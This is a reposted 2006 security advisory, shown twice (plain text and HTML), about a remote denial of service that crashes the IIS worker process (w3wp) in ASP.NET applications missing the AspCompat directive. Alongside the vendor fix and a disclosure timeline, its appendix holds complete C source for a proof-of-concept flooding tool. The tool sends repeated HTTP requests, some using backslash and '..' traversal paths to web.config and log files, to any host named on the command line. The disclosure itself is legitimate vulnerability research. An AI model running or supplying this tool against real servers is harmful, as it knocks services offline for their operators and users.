首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
The IIS Worker Process (w3wp) DOS in ASP.NET. POC Exploit
来源:www.hackingspirits.com 作者:Debasis 发布时间:2006-03-27  

--0-1633069887-1142992701=:20251
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Sorry, if you are receiving multiple copies of it. Just resending as the one that I sent last night has not yet appeared.

w3wp remote DoS due to improper reference of STA COM components in ASP.NET ===========================================================================

Vendor: Microsoft Corporation
MSRC (Microsoft Security Response Center) Case No: MSRC 6367sd Product Info: IIS Worker Process (w3wp)

I. BACKGROUND
Early last year while I was trying out few canonicalization attacks on sites running asp.net applications, I came across an un-expected remote DoS against the worker process (i.e. w3wp). As the frequency of success was *random*, I didn’t took much interest in it. However during one more test in my home lab, I was able to reproduce the same w3wp crash again (almost with 7 out of 10 success ratio) which is why I thought of debugging and investigating more on this issue.

After working for more than one month with Microsoft (MSRC) on this issue, it is finally concluded that the crash can occur un-expectedly and is due to improper reference of COM or COM+ in the asp.net applications. Often developers forget to use the “AspCompat” directive which is required while referencing COM components in ASP.NET. Below are the links which provides the insight on the appropriate usage of ‘AspCompat’ :
http://msdn2.microsoft.com/en-us/library/zwk9h2kb.aspx
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnbda/html/dbgch04.asp


II. DESCRIPTION

Missing AspCompat directive causes general instability and poor performance of the web application, just a simple increase of load on a web server may cause it to crash.

If simultaneous requests are made to the webserver for atleast 100 – 300 for each URL that references COM components and restricted files (within the application directory path) then the worker process fails or crash at any particular instant. The URLs can look something similar to those given below:

http://<Domain>/asp-app\web.config
http://<Domain>/asp-app\default.aspx (sample links with reference to any COM component) http://<Domain>/asp-app\..\aspapplogs/log1.log


III. TESTING ENVIRONMENT
This test has been performed on –
Windows 2003 (SP1) + IIS 6.0 + .NET Framework 1.1 Windows XP Professional Edition + IIS 6.0 + .NET Framework 1.1


IV. PROOF-OF-CONCEPT
The exploit code and the PoC details can be downloaded from the following link:
http://hackingspirits.com/vuln-rnd/vuln-rnd.html


V. SOLUTION (PROVIDED BY MICROSOFT)

ASP-intrinsic objects (like STA COM components) are not enabled in ASP.NET by default, and in ASP.NET, the thread pool is a multithreaded apartment (MTA) by default. So, to use the COM components effectively these defaults should be explicitly changed by using the following attribute in the @Page directive:

<%@Page ASPCompat="true" %>

This directive causes ASP.NET to provide access to ASP-intrinsic objects and changes the thread pool to STA. It is observed that after addition of this directive, the issue gets resolved.


VI. HISTORY

1/10/2006 - Bug reported to the vendor
1/11/2006 - MSRC acknowledged and assigned a case number 6367
1/12/2006 - Vendor requested for additional info
1/12/2006 - Vendor provided with additional info
1/24/2006 - Vendor requested for stack dump
1/27/2006 - Stack dump was provided to vendor
2/02/2006 - Vendor requested for a re-test with the a temporary fix applied
2/10/2006 - Issue re-tested with the fix applied and the test failed
2/18/2006 - Vendor confirmed the issue and suggested the fix.
<Snip>
ASP.NET customers forgetting to add ASPCompat=true when it's needed was a typical problem that we used to see a lot, but it does not happen that often. Symptoms are various hangs, crashes and slowdowns which can be confusing. The proper way to use COM components in ASP.NET applications is well-documented on MSDN.
</ Snip >
2/23/2006 - Vendor requested to get the security advisory passed via the MSRC before releasing.
3/14/2006 - Vendor provided with the draft version of the advisory
3/16/2006 - Vendor reviewed the advisory and suggested minor changes
3/21/2006 - Vendor provided with the updated advisory with the necessary changes made
3/21/2006 - Vendor granted permission to release the advisory
3/21/2006 - Public Disclosure



VII. CREDITS

Debasis Mohanty
www.hackingspirits.com
debasis@hackingspirits.com

Download PoC for more details - http://hackingspirits.com/vuln-rnd/vuln-rnd.html


Note: Any queries related to this issue and its fix can be directed to Microsoft with the MSRC case number 6367. Crash Dump will be provided only on request.


Appendix I

// w3wp-dos.c //

#include "stdafx.h"

#pragma comment (lib,"ws2_32")

#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>

char * pszUnauthLinks(DWORD);

#define portno 80

int main(int argc, CHAR* argv[])
{
char szWorkBuff[100];
DWORD dwCount = 0, dwCounter;
int iCnt = 0, iCount = 0;

SOCKET conn_socket;
WSADATA wsaData;
struct sockaddr_in sin;
struct hostent *phostent;
char *pszTargetHost = new char[MAX_PATH];
UINT uAddr;

if (argc<2)
{
printf("============================================\n");
printf("\t\t w3wp-dos by Debasis Mohanty\n");
printf("\t\t www.hackingspirits.com\n");
printf("============================================\n");

printf("\nUsage: w3wpdos <HostIP / HostName> \n\n");

exit(0);
}

int iRetval;
if((iRetval = WSAStartup(0x202,&wsaData)) != 0) {
printf( "WSAStartup failed with error %d\n",iRetval);
WSACleanup(); exit(1); }

// Make a check on the length of the parameter provided
if (strlen(argv[1]) > MAX_PATH) {
printf( "Too long parameter ....\n"); exit(1); }
else
strcpy(pszTargetHost, argv[1]);

// Resolve the hostname into IP address or vice-versa
if(isalpha(pszTargetHost[0]))
phostent = gethostbyname(pszTargetHost);
else {
uAddr = inet_addr(pszTargetHost);
phostent = gethostbyaddr((char *)&uAddr,4,AF_INET);

if(phostent != NULL)
wsprintf( pszTargetHost, "[+] %s", phostent->h_name);
else {
printf( "Failed to resolve IP address, please provide host name.\n" );
WSACleanup();
exit(1);
}
}

if (phostent == NULL ) {
printf("Cannot resolve address [%s]: Error %d\n", pszTargetHost,
WSAGetLastError());

WSACleanup();
printf( "Target host seems to be down or the program failed to resolve host name.");
printf( "Press enter to exit" );

getchar();
exit(1); }

// Initialise Socket info
memset(&sin,0,sizeof(sin));
memcpy(&(sin.sin_addr),phostent->h_addr,phostent->h_length);
sin.sin_family = phostent->h_addrtype;
sin.sin_port = htons(portno);

conn_socket = socket(AF_INET, SOCK_STREAM, 0);
if (conn_socket < 0 ) {
printf("Error Opening socket: Error %d\n", WSAGetLastError());
WSACleanup();

return -1;}

printf("============================================\n");
printf("\t\t w3wp-dos by Debasis Mohanty\n");
printf("\t\t www.hackingspirits.com\n");
printf("============================================\n");

printf("[+] Host name: %s\n", pszTargetHost);
wsprintf( szWorkBuff, "%u.%u.%u.%u",
sin.sin_addr.S_un.S_un_b.s_b1,
sin.sin_addr.S_un.S_un_b.s_b2,
sin.sin_addr.S_un.S_un_b.s_b3,
sin.sin_addr.S_un.S_un_b.s_b4 );
printf("[+] Host IP: %s\n", szWorkBuff);

closesocket(conn_socket);

printf("[+] Ready to generate requests\n");

/* The count should be modified depending upon the
number of links in the szBuff array */
while(dwCount++ < 10)
{

conn_socket = socket(AF_INET, SOCK_STREAM, 0);
memcpy(phostent->h_addr, (char *)&sin.sin_addr, phostent->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(portno);

if(connect(conn_socket, (struct sockaddr*)&sin,sizeof(sin))!=0)
perror("connect");

printf( "[%i] %s", dwCount, pszUnauthLinks(dwCount));
for(dwCounter=1;dwCounter < 9;dwCounter++)
{
send(conn_socket,pszUnauthLinks(dwCount), strlen(pszUnauthLinks(dwCount)),0);

char *szBuffer = new char[256];
recv(conn_socket, szBuffer, 256, 0);
printf(".");
// if( szBuffer != NULL)
// printf("%s", szBuffer);
delete szBuffer;
Sleep(100);
}
printf("\n");
closesocket(conn_socket);
}

return 1;
}


char * pszUnauthLinks( DWORD dwIndex )
{
char *szBuff[10];
TCHAR *szGetReqH = new char[1024];

/* Modify the list of links given below to your asp.net links. The list should carry links which refer to any COM components and as well as other restricted links under the asp.net app path. */

szBuff[1] = "GET /aspnet-app\\web.config";
szBuff[2] = "GET /aspnet-app\\../aspnetlogs\\log1.logs";
szBuff[3] = "GET /aspnet-app\\default-userscreen.aspx";
szBuff[4] = "GET /aspnet-app\\users/config.aspx";
szBuff[5] = "GET /aspnet-app\\links/anycomref.aspx"; //
szBuff[6] = "GET /aspnet-app\\com-ref-link1.aspx"; // Links of pages referring
szBuff[7] = "GET /aspnet-app\\com-ref-link2.aspx"; // COM components.
szBuff[8] = "GET /aspnet-app\\com-ref-link3.aspx"; //
szBuff[9] = "GET /aspnet-app\\com-ref-link4.aspx"; //

/* Prepare the GET request for the desired link */
strcpy(szGetReqH, szBuff[dwIndex]);
strcat(szGetReqH, " HTTP/1.1\r\n");
strcat(szGetReqH, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
strcat(szGetReqH, "Accept-Language: en-us\r\n");
strcat(szGetReqH, "Accept-Encoding: gzip, deflate\r\n");
strcat(szGetReqH, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\n");
strcat(szGetReqH, "Host: \r\n" );
strcat(szGetReqH, "Connection: Keep-Alive\r\n" );

/* Insert a valid Session Cookie and ASPVIEWSTATE to get more effective result */
strcat(szGetReqH, "Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;\r\n" );
strcat(szGetReqH, ".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D\r\n\r\n" );

// return szBuff[dwIndex];
return szGetReqH;
}

------ x --------



---------------------------------
To help you stay safe and secure online, we've developed the all new Yahoo! Security Centre.
--0-1633069887-1142992701=:20251
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Sorry, if you are receiving multiple copies of it. Just resending as the one that I sent last night has not yet appeared.<br> <br> w3wp remote DoS due to improper reference of STA COM components in ASP.NET ===========================================================================<br> <br> Vendor: Microsoft Corporation<br> MSRC (Microsoft Security Response Center) Case No: MSRC 6367sd Product Info: IIS Worker Process (w3wp)<br> <br> I. BACKGROUND<br> Early last year while I was trying out few canonicalization attacks on sites running asp.net applications, I came across an un-expected remote DoS against the worker process (i.e. w3wp). As the frequency of success was *random*, I didn’t took much interest in it. However during one more test in my home lab, I was able to reproduce the same w3wp crash again (almost with 7 out of 10 success ratio) which is why I thought of debugging and investigating more on this issue.<br> <br> After working for more than one mon
th with
Microsoft (MSRC) on this issue, it is finally concluded that the crash can occur un-expectedly and is due to improper reference of COM or COM+ in the asp.net applications. Often developers forget to use the “AspCompat” directive which is required while referencing COM components in ASP.NET. Below are the links which provides the insight on the appropriate usage of ‘AspCompat’ :<br> http://msdn2.microsoft.com/en-us/library/zwk9h2kb.aspx<br> http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnbda/html/dbgch04.asp<br> <br> <br> II.    DESCRIPTION<br> <br> Missing AspCompat directive causes general instability and poor performance of the web application, just a simple increase of load on a web server may cause it to crash. <br> <br> If simultaneous requests are made to the webserver for atleast 100 – 300 for each URL that references COM components and restricted files (within the application directory path) then the worker process
fails
or crash at any particular instant. The URLs can look something similar to those given below:<br> <br> http://<Domain>/asp-app\web.config<br> http://<Domain>/asp-app\default.aspx (sample links with reference to any COM component) http://<Domain>/asp-app\..\aspapplogs/log1.log<br> <br> <br> III.    TESTING ENVIRONMENT<br> This test has been performed on –<br> Windows 2003 (SP1) + IIS 6.0 + .NET Framework 1.1 Windows XP Professional Edition + IIS 6.0 + .NET Framework 1.1<br> <br> <br> IV.    PROOF-OF-CONCEPT<br> The exploit code and the PoC details can be downloaded from the following link:<br> http://hackingspirits.com/vuln-rnd/vuln-rnd.html<br> <br> <br> V.    SOLUTION (PROVIDED BY MICROSOFT)<br> <br> ASP-intrinsic objects (like STA COM components) are not enabled in ASP.NET by default, and in ASP.NET, the thread pool is a multithreaded apartment (MTA) by default. So, to use the COM compone
nts
effectively these defaults should be explicitly changed by using the following attribute in the @Page directive:<br> <br> <%@Page ASPCompat="true" %><br> <br> This directive causes ASP.NET to provide access to ASP-intrinsic objects and changes the thread pool to STA. It is observed that after addition of this directive, the issue gets resolved. <br>  <br> <br> VI.    HISTORY<br> <br> 1/10/2006 -     Bug reported to the vendor<br> 1/11/2006 -     MSRC acknowledged and assigned a case number 6367 <br> 1/12/2006 -     Vendor requested for additional info<br> 1/12/2006 -     Vendor provided with additional info<br> 1/24/2006 -     Vendor requested for stack dump<br> 1/27/2006 -     Stack dump was provided to vendor<br> 2/02/2006 -     Vendor requested for a re-test with the a temporary fix applied<br> 2/10/2006 -    &nbs
p;Issue
re-tested with the fix applied and the test failed<br> 2/18/2006 -     Vendor confirmed the issue and suggested the fix. <br> <Snip><br> ASP.NET customers forgetting to add ASPCompat=true when it's needed was a typical problem that we used to see a lot, but it does not happen that often. Symptoms are various hangs, crashes and slowdowns which can be confusing. The proper way to use COM components in ASP.NET applications is well-documented on MSDN. <br> </ Snip ><br> 2/23/2006 -     Vendor requested to get the security advisory passed via the MSRC before releasing.<br> 3/14/2006 -     Vendor provided with the draft version of the advisory<br> 3/16/2006 -     Vendor reviewed the advisory and suggested minor changes<br> 3/21/2006 -     Vendor provided with the updated advisory with the necessary changes made <br> 3/21/2006 -     Vendor granted permission to release
the
advisory<br> 3/21/2006 -     Public Disclosure<br> <br> <br> <br> VII.    CREDITS<br> <br> Debasis Mohanty<br> www.hackingspirits.com<br> debasis@hackingspirits.com <br> <br> Download PoC for more details - http://hackingspirits.com/vuln-rnd/vuln-rnd.html<br> <br> <br> Note: Any queries related to this issue and its fix can be directed to Microsoft with the MSRC case number 6367. Crash Dump will be provided only on request.<br> <br> <br> Appendix I<br> <br> // w3wp-dos.c //<br> <br> #include "stdafx.h"<br> <br> #pragma comment (lib,"ws2_32")<br> <br> #include <winsock2.h><br> #include <windows.h><br> #include <stdlib.h><br> #include <stdio.h><br> #include <string.h><br> #include <stdio.h><br> #include <ctype.h><br> <br> char * pszUnauthLinks(DWORD);<br> <br> #define portno    80<br> <br> int main(int argc, CHAR* argv[])<br> {<br>   
 char    szWorkBuff[100];<br>     DWORD    dwCount = 0, dwCounter;<br>     int    iCnt = 0, iCount = 0;<br> <br>     SOCKET    conn_socket; <br>     WSADATA wsaData;<br>     struct    sockaddr_in sin;<br>     struct    hostent *phostent;<br>     char    *pszTargetHost = new char[MAX_PATH]; <br>     UINT    uAddr; <br>     <br>     if (argc<2)<br>     {<br>         printf("============================================\n");<br>         printf("\t\t w3wp-dos by Debasis Mohanty\n");<br>         printf("\t\t www.hackingspirits.com\n");<br>       
 printf("============================================\n");<br> <br>         printf("\nUsage: w3wpdos <HostIP / HostName> \n\n");<br> <br>         exit(0);<br>     }<br>     <br>     int iRetval; <br>     if((iRetval = WSAStartup(0x202,&wsaData)) != 0) {<br>         printf( "WSAStartup failed with error %d\n",iRetval);<br>         WSACleanup(); exit(1); }<br> <br>     // Make a check on the length of the parameter provided<br>     if (strlen(argv[1]) > MAX_PATH)    { <br>         printf( "Too long parameter ....\n"); exit(1); }<br>     else<br>         strcpy(pszTargetHost, argv[1]);<br> <br>     // Resolve the hostname i
nto IP
address or vice-versa<br>     if(isalpha(pszTargetHost[0])) <br>         phostent = gethostbyname(pszTargetHost);<br>         else  { <br>         uAddr = inet_addr(pszTargetHost);<br>         phostent = gethostbyaddr((char *)&uAddr,4,AF_INET);<br>         <br>     if(phostent != NULL)<br>         wsprintf( pszTargetHost, "[+] %s", phostent->h_name);<br>     else    {<br>         printf( "Failed to resolve IP address, please provide host name.\n" );<br>             WSACleanup();<br>             exit(1);    <br>         }<br>   
 
}<br>     <br>     if (phostent == NULL )    {<br>       printf("Cannot resolve address [%s]: Error %d\n", pszTargetHost, <br>           WSAGetLastError());<br>     <br>       WSACleanup();<br>       printf( "Target host seems to be down or the program failed to resolve host name.");<br>       printf( "Press enter to exit" );<br> <br>       getchar();<br>       exit(1); }<br> <br> // Initialise Socket info<br>     memset(&sin,0,sizeof(sin));<br>     memcpy(&(sin.sin_addr),phostent->h_addr,phostent->h_length);<br>     sin.sin_family = phostent->h_addrtype;<br>     sin.sin_port = htons(portno);<br> <br>     conn_socket = socket(AF_INET, SOCK_STREA
M, 0);
<br>     if (conn_socket < 0 )    {<br>         printf("Error Opening socket: Error %d\n", WSAGetLastError());<br>         WSACleanup();<br>         <br>         return -1;}<br> <br>     printf("============================================\n");<br>     printf("\t\t w3wp-dos by Debasis Mohanty\n");<br>     printf("\t\t www.hackingspirits.com\n");<br>     printf("============================================\n");<br> <br>     printf("[+] Host name: %s\n", pszTargetHost);<br>     wsprintf( szWorkBuff, "%u.%u.%u.%u", <br>         sin.sin_addr.S_un.S_un_b.s_b1,<br>         sin.sin_addr.S_un.S_un_b.s_b2,<br>       
 sin.sin_addr.S_un.S_un_b.s_b3,<br>         sin.sin_addr.S_un.S_un_b.s_b4 );<br>     printf("[+] Host IP: %s\n", szWorkBuff);<br> <br>     closesocket(conn_socket);<br> <br>     printf("[+] Ready to generate requests\n");<br>     <br>     /* The count should be modified depending upon the <br>     number of links in the szBuff array    */<br>     while(dwCount++ < 10) <br>     {                        <br>         <br>         conn_socket = socket(AF_INET, SOCK_STREAM, 0);<br>         memcpy(phostent->h_addr, (char *)&sin.sin_addr, phostent->h_length);<br>         sin.sin_f
amily =
AF_INET;<br>         sin.sin_port = htons(portno);<br> <br>         if(connect(conn_socket, (struct sockaddr*)&sin,sizeof(sin))!=0)<br>             perror("connect");<br>         <br>         printf( "[%i] %s", dwCount, pszUnauthLinks(dwCount));<br>         for(dwCounter=1;dwCounter < 9;dwCounter++) <br>         {<br>             send(conn_socket,pszUnauthLinks(dwCount), strlen(pszUnauthLinks(dwCount)),0);<br> <br>             char *szBuffer = new char[256];<br>             recv(conn_socket, szBuffer, 256, 0);<br>             printf(".");<br> //  &nb
sp;
         if( szBuffer != NULL) <br> //                printf("%s", szBuffer);<br>             delete szBuffer;<br>             Sleep(100);<br>         }<br>         printf("\n");<br>         closesocket(conn_socket);<br>     }<br> <br>     return 1;<br> }<br> <br> <br> char * pszUnauthLinks( DWORD dwIndex )<br> {<br>     char    *szBuff[10];<br>     TCHAR    *szGetReqH = new char[1024]; <br> <br> /*    Modify the list of links given below to your asp.net links. The list should carry links which refer to any COM components and as well as other restricted links under the asp.net app
path.
    */<br> <br>     szBuff[1] = "GET /aspnet-app\\web.config";<br>     szBuff[2] = "GET /aspnet-app\\../aspnetlogs\\log1.logs";<br>     szBuff[3] = "GET /aspnet-app\\default-userscreen.aspx";<br>     szBuff[4] = "GET /aspnet-app\\users/config.aspx";<br>     szBuff[5] = "GET /aspnet-app\\links/anycomref.aspx";    //<br>     szBuff[6] = "GET /aspnet-app\\com-ref-link1.aspx";        // Links of pages referring <br>     szBuff[7] = "GET /aspnet-app\\com-ref-link2.aspx";        // COM components.<br>     szBuff[8] = "GET /aspnet-app\\com-ref-link3.aspx";        //<br>     szBuff[9] = "GET /aspnet-app\\com-ref-link4.aspx";        //<br> <br>     /* Prepare the GET request
for the
desired link */<br>     strcpy(szGetReqH, szBuff[dwIndex]);<br>     strcat(szGetReqH, " HTTP/1.1\r\n");<br>     strcat(szGetReqH, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");<br>     strcat(szGetReqH, "Accept-Language: en-us\r\n");<br>     strcat(szGetReqH, "Accept-Encoding: gzip, deflate\r\n");<br>     strcat(szGetReqH, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\n");<br>     strcat(szGetReqH, "Host: \r\n" );<br>     strcat(szGetReqH, "Connection: Keep-Alive\r\n" );<br> <br> /* Insert a valid Session Cookie and ASPVIEWSTATE to get more effective result */<br>     strcat(szGetReqH, "Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;\r\n" );<br>     strcat(szGetReqH,
".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D\r\n\r\n" );<br>     <br>     // return szBuff[dwIndex];<br>     return szGetReqH;<br> }<br> <br> ------ x --------<br> <br> <p>
<hr size=1><font face="Arial" size="2">To help you stay safe and secure online, we've developed the all new <a href="http://us.rd.yahoo.com/mail/uk/taglines/default/security_centre/*http://uk.security.yahoo.com/"><b>Yahoo! Security Centre</b></a>.</font>
--0-1633069887-1142992701=:20251--



 
[推荐] [评论(2条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ASPPortal <= 3.1.1 Remote S
·VWar Remote Code Execution (Ex
·IGMP v3 DoS (MS06-007, Exploit
·Internet Explorer 0day Unoffic
·FarsiNews Remote File Inclusio
·Zdaemon and xdoom Multiple Vul
·Apple Mac OS X File Rewrites a
·MS Internet Explorer (createTe
·BomberClone Buffer Overflow Ex
·Total Commander unacev2.dll Bu
·X.Org X11 (X11R6.9.0/X11R7.0)
·Crafty Syntax Image Gallery &l
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved